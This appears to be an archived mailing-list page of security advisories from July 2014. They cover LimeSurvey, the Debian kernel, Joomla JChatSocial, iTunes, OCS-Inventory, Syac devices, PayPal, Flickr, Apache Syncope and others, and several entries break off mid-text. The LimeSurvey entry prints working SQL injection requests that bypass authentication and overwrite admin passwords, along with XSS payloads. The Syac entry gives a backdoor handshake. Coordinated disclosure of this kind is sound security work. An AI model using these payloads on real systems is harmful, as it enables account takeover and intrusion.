Lime Survey 2-05+ Multiple Vulnerabilities

2014-07-07 Thread g-damore
Lime Survey Multiple Vulnerabilities
===

[ADVISORY INFORMATION]
Title:  Lime Survey Multiple Vulnerabilities
Discovery date: 02/07/2014
Release date:   03/07/2014
Vendor Homepage:www.limesurvey.org
Version:Lime Survey 2.05+ Build 140618
Tested with:MS SQL Server 2008
Credits:Giuseppe D'Amore 
(http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
 
[VULNERABILITY INFORMATION]
Class:  SQL Injection + XSS
Category:   Web

[AFFECTED PRODUCTS]
This security vulnerability affects:

* Lime Survey 2.05+ Build 140618

[VULNERABILITY DETAILS]
Multi-Byte SQL Injection


As shown in frontend_helper.php:

**
function loadanswers()
{
global $surveyid;
global $thissurvey, $thisstep;
global $clienttoken;
$clang = Yii::app()-lang;

$scid=returnGlobal('scid',true);
if (Yii::app()-request-getParam('loadall') == reload)
{
$query = SELECT * FROM {{saved_control}} INNER JOIN 
{$thissurvey['tablename']}
ON {{saved_control}}.srid = {$thissurvey['tablename']}.id
WHERE {{saved_control}}.sid=$surveyid\n;
if (isset($scid)) //Would only come from email

{
$query .= AND {{saved_control}}.scid={$scid}\n;
}
$query .=AND {{saved_control}}.identifier = 
'.autoEscape($_SESSION['survey_'.$surveyid]['holdname']).' ;
**

the function autoEscape is applied on the holdname parameter, this function is 
defined in the file common_helper.php

**
function autoEscape($str) {
if (!get_magic_quotes_gpc()) {
return addslashes ($str);
}
return $str;
}
**

addslashes can be bypassed using the GBK charset. So sending this request:

**
POST /limesurvey/index.php?r=survey/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/limesurvey/index.php?r=survey/index
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; 
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2loadname=chr(0x87) . ' 
OR 1=1 -- ;loadpass=testloadsecurity=89sid=713149loadall=reload
***

it is possible to bypass imcomplete survey authentication.

Stacked Query SQL Injection
---

Sending this request:

***
POST /limesurvey/index.php?r=admin/participants/sa/getParticipants_json HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: 
http://localhost/limesurvey/index.php?r=admin/participants/sa/displayParticipants
Content-Length: 141
Cookie: PHPSESSID=as31m846sa46p2uqso1eopc587; 
YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

YII_CSRF_TOKEN=a3d3b2de671e18e0eb5b9fbe64f049a66bfe23b2searchcondition=_search=falsend=1404300424270rows=25page=1sidx=lastname];
 update lime_users set 
password='880e042d271f08cd3c456f28704702a6b0ad1c7b442f257bf40578112c8e6ffb';+--+Psord=asc


it is possible to change the users's password.

Reflected XSS
-
GET 
/limesurvey/index.php?r=admin%2fparticipants%2fsa%2fgetAttribute_json%2fpid%2f9b0039e2-b346-473d-901f-7010d2bc88c16c2d4img%20src%3da%20onerror%3dalert(1)9b6d6fe2f71YII_CSRF_TOKEN=76fa68bdfde6a997ee64f01726234fd7897e2289_search=falsend=140420566784
GET 
/limesurvey/index.php?r=admin/globalsettingssa=ascriptalert(1)/scripta

XSS via CSV
---

it is possible to create a .csv file with inside scriptalert(2)/script,0 
and and upload it with the functionality Import CSV.

 
[DISCLOSURE TIME-LINE]
* 02/07/2014 - Initial vendor contact.
 
* 02/07/2014 - Lime Survey Team confirmed the issue is a new security 
vulnerability.
 
* 02/07/2014 - Vendor has fixed this vulnerability on Git.
 
* 03/07/2014 - Public disclosure.
 
[DISCLAIMER]
The author is not 

[SECURITY] [DSA 2972-1] linux security update

2014-07-07 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2972-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
July 06, 2014  http://www.debian.org/security/faq
- -

Package: linux
CVE ID : CVE-2014-4699

Andy Lutomirski discovered that the ptrace syscall was not verifying the
RIP register to be valid in the ptrace API on x86_64 processors. An
unprivileged user could use this flaw to crash the kernel (resulting in
denial of service) or for privilege escalation.

For the stable distribution (wheezy), this problem has been fixed in
version 3.2.60-1+deb7u1. In addition, this update contains several
bugfixes originally targeted for the upcoming Wheezy point release.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your linux packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJTuW7PAAoJEAVMuPMTQ89EryEP/3iUzWWveiBYU6GCWfFEqUMw
5BBcKFkNsxLbWWMXTpAShO9x1VPOQznddYA1qg5rMqvsNjoQFqKJN7d3tMjzYUi4
wVpYnBCsmskXHXYTlkr/43Iafn7v4J7796X6uZiUpvosqXJr6wBdqwo57KjL4IRc
K0YlnmU6PrJ2scEEph/czP+c9o3f5MPGhw8YyHN0GFeQmLAc2JdrAZwKCD5Awloj
CCH5Wh34km3v/y4HzBDeBeqxp8s610vre/+Crt4aD/HvAf7Dho/uyw1VR5D8vKHH
eHvwVX9JYMAsDAuDd7j4xooTh4l9ts3NVivvLK/flFEj+1lLo+WEhZO+MvNt/lRH
XOpHLNltAt7LHQZqh07RqJ/Ggf8ieotqiNSCUJJoJy+3FiVvSIvqYbsA0OmvbVY5
c97dxLJSZMjCnPpkMdn8Xh66HGznHbsmT436nngsoneejSpieViNRH4T9rskJylw
6epCTKW/aLbn2+Avju0b3H7s0teiafhWXfNuIk/q6tuu1WDYuqvhimxs94EVWtFz
SynAiszxbjnOAGrvsy0EYM+5Kof/VUvPm2Q7supucXbcsVI3ffyEHKoqukAZhAs6
Lx4m6dYQQ3dzbubalFLBoklVqkIGV3+M6aXrLgdcGa+rRBee1+c4ZRXgHjKVAl2L
dcifXWXUR3J/5gJbs2yq
=Zy2b
-END PGP SIGNATURE-



Re: Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

2014-07-07 Thread a . blas
Hi, 

We have just released an App to check if your device is affected by this bug:

https://play.google.com/store/apps/details?id=com.actisec.keystorescanner

Thanks.
Arturo


CVE-2014-3863 - Stored XSS in JChatSocial

2014-07-07 Thread Teodor Lupan
CVE-2014-3863
===
Stored Cross-Site Scripting (XSS) (CWE-79) vulnerability in
JChatSocial Joomla extension.

Vendor
===
Joomla! Extensions Store

Product
===
JChatSocial: the Joomla live chat
JChatSocial is a powerful chat system for Joomla with a look so similar
to Facebook chat and it's easy to install and configure. Users can
choose to start a private chat or join a group conversation, all
completely free of charge because data stream is processed on your
server. In addition JChatSocial integrates with Skype software to start
video calls directly within your Joomla! site, and has many advanced
feature such as attachments exchange, avatars and more.  - source:
http://storejoomla.org/extensions/jchatsocial.html

Affected versions
===
This vulnerability affects versions of JChatSocial version 2.2 and
probably lower

Solution
===
The vendor has fixed the issue within few ours after receiving the
vulnerability details, on 29.05.2014

Reported by
===
This issue was reported to the vendor by Teodor Lupan following a
responsible disclosure process.

Severity
===
High

Exploitability
===
Easy: no user interaction required

Description
===
The discovered Stored Cross Site Scripting can be used by anonymous
users (unregistered) or on some setups - registered users - to target
any other user types, including (Joomla) administrators, and execute any
XSS attack type - like steal their session ID.

Vulnerability details:
In an active JChat window, it is possible to upload a file and send it
to any other connected user. An attacker could insert
malicious JavaScript code into the 'filename' input parameter which will
be included into the active chat window and executed by the browser
of the target without user interaction.


-- 
Teodor Lupan - LPT, CEH, OSCP
Technical Director

Strada Doamna Cheajna nr. 1-3,
etaj 4, Birou 7, Sector 3,
cod 31233, Bucureşti, România
Tel/Fax: +4 021 316 05 65
Mobil: +4 0723 010 220
e-mail: teodor.lu...@safetech.ro
Web: www.safetech.ro



iTunes 11.2.2 for Windows: completely outdated and vulnerable 3rd party libraries

2014-07-07 Thread Stefan Kanthak
Hi @ll,

Apples current iTunes 11.2.2 for Windows comes with the following
COMPLETELY outdated and vulnerable 3rd party libraries (as part of
AppleApplicationSupport.msi):

* libeay32.dll and ssleay32.dll 0.9.8d

  are more than SEVEN years old and have at least 27 unfixed CVEs!
  the current version is 0.9.8za, see http://www.openssl.org/news/


* libcurl.dll 7.16.2

  is more than SEVEN years old and has at least 18 unfixed CVEs!
  the current version is 7.37.0;
  see http://curl.haxx.se/docs/security.html
  for the fixed vulnerabilities!


* libxml2.dll 2.6.0.0

  is more than TEN years old and has at least 17 unfixed CVEs!
  the current version is 2.9.1, for the latest vulnerability see
  CVE-2013-0339


* icuuc40.dll, icuin40.dll, icudt49.dll, libicuuc.dll and libicuin.dll 49.1.1

  have at least 4 unfixed CVEs: CVE-2013-2419, CVE-2013-2383, CVE-2013-2384,
  CVE-2013-1569


Until Apples developers start to develop a sense for safety and security:
stay away from their (Windows) software!


regards
Stefan Kanthak


Timeline:
~

2014-06-06informed vendor

2014-06-06vendor sent automated response

... no more reaction

2014-07-03requested status

... no answer

2014-07-07report published


{CVE-ID request} - OCS-Inventory-NG Multiple Stored Cross Site Scripting Vulnerabilities.

2014-07-07 Thread Madhu Akula



# Title: Multiple Stored Cross Site Scripting Vulnerabilities
# Author: Madhu Akula
# Vendor Homepage: http://www.ocsinventory-ng.org/en/
# Software Link: http://www.ocsinventory-ng.org/en/download/
# Tested on: Chrome, Mozilla



Reporter Name : Madhu Akula

Product : OCS-Inventory NG

Version : All Versions

Modules : OCS Reports Web Interface

Tested On : Windows, Linux, Mac

Browsers : Firefox, Chrome, IE and all other also

Priority : High

Severity: Critical

Status : New

Summary : Multiple Stored Cross Site Scripting Vulnerabilities leads to
take over the User accounts  Internal Network scanning and some
advanced attacks

Description :

About Vulnerability :

Stored attacks are those where the injected script is permanently stored
on the target servers, such as in a database, in a message forum,
visitor log, comment field, etc. The victim then retrieves the malicious
script from the server when it requests the stored information.

Impact :

Attackers can execute scripts in a victim’s browser to hijack user
sessions, deface web sites, insert hostile content, redirect users,
hijack the user’s browser using malware, etc.

For more reference :

https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Conclusion :

By using this vulnerability attackers use some frame works like Beef,
OWASP xenotix to exploit the victim browsers and he can able to install
key loggers and some other malicious activities also and it's very high
sever and affected to all fields and versions.

Steps to Reproduce : (POC)

I created a clear poc and the link is here,

https://www.dropbox.com/s/7bbdv8o8q1faotk/ocsng_sxsss.ogv

Mitigation :

Fixed release in SVN


References :

http://packetstormsecurity.com/files/127295/OCS-Inventory-NG-Cross-Site-Scripting.html
http://cxsecurity.com/issue/WLB-2014070004
http://www.securityfocus.com/bid/68292
http://irist.ir/exploits-1663.html

Credit :
Madhu Akula
Information Security Researcher
https://www.twitter.com/madhuakula





Backdoor access to Techboard/Syac devices

2014-07-07 Thread roberto . paleari
[ADVISORY INFORMATION]
Title:  Backdoor access to Techboard/Syac devices
Discovery date: 02/04/2014
Release date:   07/07/2014
Advisory URL:   http://blog.emaze.net/2014/07/backdoor-techboardsyac.html
Credits:Roberto Paleari (@rpaleari),
Luca Giancane (luca.gianc...@emaze.net)

[VULNERABILITY INFORMATION]
Class:  Command execution, Authentication bypass

[AFFECTED PRODUCTS]
We confirm the presence of the security vulnerability on the following
products/firmware versions:
   * Techboard/Syac DigiEye 3G (software version 3.19.30004)

Other device models and firmware versions are probably also vulnerable, but
they were not checked.

[VULNERABILITY DETAILS]
During a security assessment on one of our customers, we had the opportunity to
analyze a Techboard/Syac DigiEye. The assessment led to the identification of a
critical security vulnerability, described in the next paragraphs.

More in detail, affected devices include a backdoor service listening on TCP
port 7339. This service implements a challenge-response protocol to
authenticate clients. After this step, clients are allowed to execute
arbitrary commands on the device, with administrative (root) privileges. We
would like to stress out that, to the best of our knowledge, end-users are not
allowed to disable the backdoor service, nor to control the authentication
mechanism.

As vulnerable devices are still widely deployed on the Internet, we won't
release the full details on the backdoor communication protocol. Instead, we
just document the initial protocol handshake, in order to allow
Techboard/Syac customers to identify vulnerable devices on their networks.

Strictly speaking, the protocol handshake works as follows:

1. The client connects to port tcp/7339 of the vulnerable device and sends the
   string KNOCK-KNOCK-ANYONETHERE?, terminated with a NULL byte.

2. The server replies with a 12-byte response. First 8 bytes are a timestamp,
   while last 4 bytes are a magic number equal to 0x000aae60.

3. The timestamp provided by the server is then used to feed the
   challenge/response procedure.

Together with this security advisory, we provide a Nmap NSE script to identify
vulnerable devices.

[REMEDIATION]
We contacted Techboard/Syac on April 2nd, 2014 and provided them with the
technical details of the vulnerability we found. The device vendor promptly
replied back to our e-mails and, on April 9th, they confirmed a patched
firmware version was going to be released to their customers. However, the
patched firmware was not checked by Emaze.

[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2014, All rights reserved worldwide.
Permission is hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service to the
professional security community. There are NO WARRANTIES with regard to this
information. Any application or distribution of this information constitutes
acceptance AS IS, at the user's own risk. This information is subject to change
without notice.


PayPal Inc Bug Bounty #74 - Persistent Core Backend Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
PayPal Inc Bug Bounty #74 - Persistent Core Backend Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1278

PayPal Inc Security UID: cDc49dT


Release Date:
=
2014-06-04


Vulnerability Laboratory ID (VL-ID):

1278


Common Vulnerability Scoring System:

8.9


Product  Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

( Copy of the Homepage: www.paypal.com ) [ http://en.wikipedia.org/wiki/PayPal ]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team (Benjamin Kunz Mejri) discovered an 
application-side vulnerability in the official  PayPal Inc ethernet portal 
backend application (api).


Vulnerability Disclosure Timeline:
==
2013-02-12: Researcher Notification  Coordination (Benjamin Kunz Mejri)
2013-02-12: Vendor Notification (PayPal Inc Site Security Team - Bug Bounty 
Program)
2013-10-28: Vendor Response/Feedback (PayPal Inc Site Security Team - Bug 
Bounty Program)
2014-01-28: Vendor Fix/Patch (PayPal Inc - Develoepr Team - Reward: 1000$)
2014-07-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PayPal Inc
Product: Core Application 2014 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details  Description:

An application-side validation web vulnerability and a filter bypass has been 
discovered in the official  PayPal Inc ethernet portal backend application 
(api).
The filter bypass allows remote attackers to evade the regular parse and encode 
filter mechanism of the paypal inc online-service portal web-application.
The persistent input validation vulnerability allows remote attackers to inject 
own malicious script codes on the application-side of the vulnerable service.

In a reverse analysis after several legal testings against the paypal inc 
infrastructure, we came to decision to test a new kind of scenario against the 
service api.
Our team tried to blind evade and bypass the online service filter validation 
of the backend listings with main values of the profile. Means whenever a 
moderator
or admin is watching the profile of the paypal inc db listed user in the 
ethernet, the persistent injected code executes. In the attack scenario we 
injected malicious 
test codes with scripts in the most attractive values of the paypal user 
profile database - `bank account owner/holder (cardholder)`, `name/surname`, 
`companyname` 
and of course the `account owner`. In the morning (2013-02-12) paypal responded 
with the following mail to us (review poc). 

The security risk of the application-side validation vulnerability in the 
security card system module is estimated as 

Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass Persistent Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
Paypal Inc Bug Bounty #109 Multi Shipping Application API - Filter Bypass  
Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1050

PayPal Security UID: Pq115cey



Release Date:
=
2014-05-14


Vulnerability Laboratory ID (VL-ID):

1050


Common Vulnerability Scoring System:

4


Product  Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its 
corporate headquarters are in San Jose, California, United 
States at eBay s North First Street satellite office campus. The company also 
has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow 
(near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), 
China s bankcard association, to allow Chinese consumers 
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia 
to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of 
denial-of-service attacks organized by Anonymous in retaliation 
for PayPal s decision to freeze the account of WikiLeaks citing terms of use 
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team has discovered a filter bypass  
persistent Web Vulnerability in the Paypal Inc core web application api.


Vulnerability Disclosure Timeline:
==
2013-08-15: Researcher Notification  Coordination (Ateeq ur Rehman Khan)
2013-08-16: Vendor Notification (PayPal Site Security Team - Bug Bounty Program)
2013-12-22: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty 
Program)
2014-05-10: Vendor Fix/Patch (PayPal Developer Team - Reward: Bug Bounty)
2014-05-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details  Description:

A filter bypass and persistent script code injection vulnerability has been 
discovered in the official Paypal service application and common service api. 
The vulnerability allows an attacker to inject own malicious script codes in 
the vulnerable module on the application side (persistent).

The vulnerability has been discovered in the Paypal MOS (Multi Order Shipping) 
Web Application (https://ship.paypal.com) and the vulnerability exists 
in the `Preset` module. While 

Yahoo! Bug Bounty #25 Flickr API - Persistent Service Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
Yahoo! Bug Bounty #25 Flickr API - Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1132


Release Date:
=
2014-07-06


Vulnerability Laboratory ID (VL-ID):

1132


Common Vulnerability Scoring System:

4.1


Product  Service Introduction:
===
Flickr is an image hosting and video hosting website, and web services suite 
that was created by Ludicorp in 2004 and acquired by Yahoo 2005. 
In addition to being a popular website for users to share and embed personal 
photographs, and effectively an online community, the service is 
widely used by photo researchers and by bloggers to host images that they embed 
in blogs and social media.

The Verge reported in March 2013 that Flickr had a total of 87 million 
registered members and more than 3.5 million new images uploaded daily.
In August 2011 the site reported that it was hosting more than 6 billion images 
and this number continues to grow steadily according to 
reporting sources. Photos and videos can be accessed from Flickr without the 
need to register an account but an account must be made in order 
to upload content onto the website. Registering an account also allows users to 
create a profile page containing photos and videos that the 
user has uploaded and also grants the ability to add another Flickr user as a 
contact. For mobile users, Flickr has official mobile apps for 
iOS, Android, PlayStation Vita, and Windows Phone operating systems.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Flickr )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research team discovered a persistent input 
validation web vulnerability in the official Yahoo Flickr! website 
web-application and api.


Vulnerability Disclosure Timeline:
==
2013-11-03: Researcher Notification  Coordination (Ateeq ur Rehman Khan - 
Vulnerability Lab)
2013-11-04: Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-01-09: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty 
Program)
2014-06-22: Vendor Fix/Patch (Yahoo! Developer Team - HackerOne Reward: 
1000$)
2014-07-06: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Yahoo!
Product: Flickr Web Application - YPL API  2013 Q3


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details  Description:

A persistent input validation vulnerability has been discovered in the official 
Yahoo Flickr! website web-application and api.
The vulnerability allows remote attackers to inject own malicious script codes 
to the application-side of the online-service.

The vulnerability is located in the flickr `invite` mail notification module. 
Remote attackers are able to inject payloads to 
the `message` value of the web-application notification service after the 
registration. The remote attacker can send invitation 
mails through the yahoo online-service module with manipulated message body 
context. The attack vector of the issue is located 
on the application-side and the request method to inject own malicious codes is 
POST.

The security risk of the persistent remote web vulnerability is estimated as 
medium with a cvss (common vulnerability scoring 
system) count of 4.1. Exploitation of the vulnerability requires low user 
interaction and a low privileged flickr web-application 
user account. Successful exploitation of the vulnerability result in session 
hijacking (customers), account steal via persistent 
web attack (mail), persistent phishing or persistent manipulation of 
notification mails module context.

Vulnerable Service(s):
[+] Yahoo!  Flickr

Vulnerable Module(s):
[+] Invite (Invitation of Users)

Vulnerable Module(s):
[+] Notification Service (eMails)

Vulnerable Parameter(s):
[+] message (body)


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged yahoo web application user account 
and low user interaction. For demonstration or to reproduce the security 
vulnerability follow the provided information and steps below to continue.

PoC: Flickr Message - Invitation Attachment  Message Body

tr style=mso-yfti-irow:1
  td style=padding:1.5pt 1.5pt 1.5pt 1.5pt
  p class=MsoNormalspan 
style=font-size:10.0pt;font-family:Arial,sans-serif 
o:p/o:p/span/p
  /td
 /tr
 tr style=mso-yfti-irow:2
  td style=border:solid #CC 1.0pt;mso-border-alt:solid #CC .75pt;
  

[SECURITY] CVE-2014-3503 Apache Syncope

2014-07-07 Thread Francesco Chicchiriccò


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



CVE-2014-3503: Insecure Random implementations used to generate passwords in
Apache Syncope

Severity: Major

Vendor: The Apache Software Foundation

Versions Affected:

This vulnerability affects all versions of Apache Syncope 1.1.x prior to 
1.1.8 'Ad libitum'. The 1.0.x releases are not affected.

Description:

A password is generated for a user in Apache Syncope under certain
circumstances, when no existing password is found. However, the password
generation code is relying on insecure Random implementations, which means that
an attacker could attempt to guess a generated password.

This has been fixed in revision:

http://svn.apache.org/viewvc?view=revisionrevision=1596537

Migration:

Syncope 1.0.x users are not affected by this issue.
Syncope 1.1.x users should upgrade to 1.1.8 'Ad libitum' as soon as possible.

References: http://syncope.apache.org/security.html

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBAgAGBQJTunsUAAoJEGe/gLEK1TmDj4AH/05J9ZOB/gyem18F9MTcG+PB
tuX7EGemHCU+fyKeTetyGdhzZzdNquMA3mR4UXOEKH1Fok4LvkBWF+BoKMSY8DgY
vtWcZUfdJFeUd1XpdUrW0D/GEbbIdmijkbVoAZ3703RMpRiDBiVBkaBr/tjC6tuf
WUoBueRmNTkInBQhabaNYXvC0vyPA5ARhu1CprJ5QpA3aFoIEaVdlJTd+Mg58vJS
tlwoyGIUEUY/pusBKaZDkTVAJhrOS9b5atjlqCPlT3kGUbQOYgRPPTihX+0CMIY2
JE4yUXR8Kx6tvgebtft2IoUp6oZdR+XqHnEe3Tv1UnSRmlHj6o+tTCBDMmm1YOY=
=o17e
-END PGP SIGNATURE-


Photo Org WonderApplications v8.3 iOS - File Include Vulnerability

2014-07-07 Thread Vulnerability Lab
Document Title:
===
Photo Org WonderApplications v8.3 iOS - File Include Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1277


Release Date:
=
2014-07-04


Vulnerability Laboratory ID (VL-ID):

1277


Common Vulnerability Scoring System:

7.1


Product  Service Introduction:
===
Create great photo albums and video diaries with PhotoOrg. Keep your photo 
album and video diary secured with passwords. 
Share your photo albums and video diary on Facebook, Twitter, Youtube, Picasa, 
Flickr and MySpace with family, friends 
and business associates.

Photo Editor with the following ability:
-Over eleven photo effects
-Four different photo enhancer
-Rotate and flip photo
-Crop photo
-Change photo brightness
-Change photo Contrast
-Change photo saturation
-Change photo sharpness
-Draw on photo with different colors
-Write text on your photo
-Remove red eyes
-Whiten photo
-Remove blemish on photo

Features:
-view your pictures and videos using your browser
-upload your picture and video using your browser
-upload video to Youtube, Picasa, Facebook, Twitter, Flickr and MySpace
-upload multiple pictures to Facebook, Twitter, Flickr and MySpace
-Keep your photo and videos organized the way you like it
-Keep your photo and video secured with password
-copy your photo and video from anywhere and paste them into the application


( Copy of the Homepage: https://itunes.apple.com/us/app/photo-org/id330740156 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a local file include 
vulnerability in the official WonderApplications Photo Org v8.3 iOS 
web-application.


Vulnerability Disclosure Timeline:
==
2014-07-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

WonderApplications
Product: Photo Org L - iOS Mobile Application 8.3


Exploitation Technique:
===
Local


Severity Level:
===
High


Technical Details  Description:

A local file include web vulnerability has been discovered in the official 
WonderApplications Photo Org v8.3 iOS web-application.
The local file include web vulnerability allows remote attackers to 
unauthorized include local file/path requests or system specific 
path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `uploadMedia` 
(uploadfile) module. Remote attackers are able to inject 
own files with malicious `filename` values in the `uploadMedia` POST method 
request to compromise the mobile web-application. The local 
file/path include execution occcurs in the index file/folder list context next 
to the vulnerable name/path value. The attacker is able 
to inject the local file request by usage of the available `wifi interface` for 
file exchange/share.

Remote attackers are also able to exploit the filename validation issue in 
combination with persistent injected script codes to execute 
different local malicious attacks requests. The attack vector is on the 
application-side of the wifi service and the request method to 
inject is POST. 

The security risk of the local file include web vulnerability is estimated as 
high with a cvss (common vulnerability scoring system) 
count of 7.1. Exploitation of the local file include web vulnerability requires 
no privileged web-application user account but low 
user interaction. Successful exploitation of the local file include web 
vulnerability results in mobile application or connected 
device component compromise.


Request Method(s):
[+] [POST]

Vulnerable Service(s):
[+] WonderApplications - WiFi Share 

Vulnerable Module(s):
[+] uploadMedia

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File/Folder Dir Listing 
(http://localhost:[port-x]/)


Proof of Concept (PoC):
===
The local file inlcude web vulnerability can be exploited by remote attackers 
with low privileged application user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: WonderApplications (Photo  Video) - Index-  Sub-Categories

htmlheadstyle type=text/css  
ul {float:left; width:100%; padding:0; margin:0; list-style-type:none; }
 
a { float:left; width:6em; text-decoration:none; color:white; 
background-color:purple; padding:0.2em 0.6em; border-right:1px solid white; }   
   
a:hover {background-color:#ff3300}   li {display:inline}  table 

ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities

2014-07-07 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities

EMC Identifier: ESA-2014-064

CVE Identifier:  CVE-2014-2513, CVE-2014-2514

